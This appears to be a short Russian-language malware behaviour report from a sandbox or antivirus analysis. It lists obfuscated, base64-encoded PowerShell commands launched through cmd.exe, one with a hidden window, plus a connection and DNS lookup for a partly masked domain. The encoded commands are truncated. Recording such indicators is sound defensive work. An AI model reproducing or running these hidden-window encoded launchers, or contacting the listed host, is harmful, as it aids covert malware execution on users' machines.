Техническая информация
- '<SYSTEM32>\cmd.exe' /C PoWerSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAAYQBFAFQASgBxAFkAdABKAHoAQwB1AEEAcQBCAFcAeQB4AGcAUQAgACgAIAAkAGYAVQBmAGoAbwA2AFIARQBuAEQAcgBoAGoASQBZAE4AZABoAEQAVQBDAHMARgBDACAALAAgACQAbQBzAFIAYwAyAFo...
- 'sh####ine-uk.com':443
- DNS ASK sh####ine-uk.com
- '<SYSTEM32>\cmd.exe' /C PoWerSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAAYQBFAFQASgBxAFkAdABKAHoAQwB1AEEAcQBCAFcAeQB4AGcAUQAgACgAIAAkAGYAVQBmAGoAbwA2AFIARQBuAEQAcgBoAGoASQBZAE4AZABoAEQAVQBDAHMARgBDACAALAAgACQAbQBzAFIAYwAyAFo...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -En ZgB1AG4AYwB0AGkAbwBuACAAYQBFAFQASgBxAFkAdABKAHoAQwB1AEEAcQBCAFcAeQB4AGcAUQAgACgAIAAkAGYAVQBmAGoAbwA2AFIARQBuAEQAcgBoAGoASQBZAE4AZABoAEQAVQBDAHMARgBDACAALAAgACQAbQBzAFIAYwAyAFoAMgBEAFUARwBqA...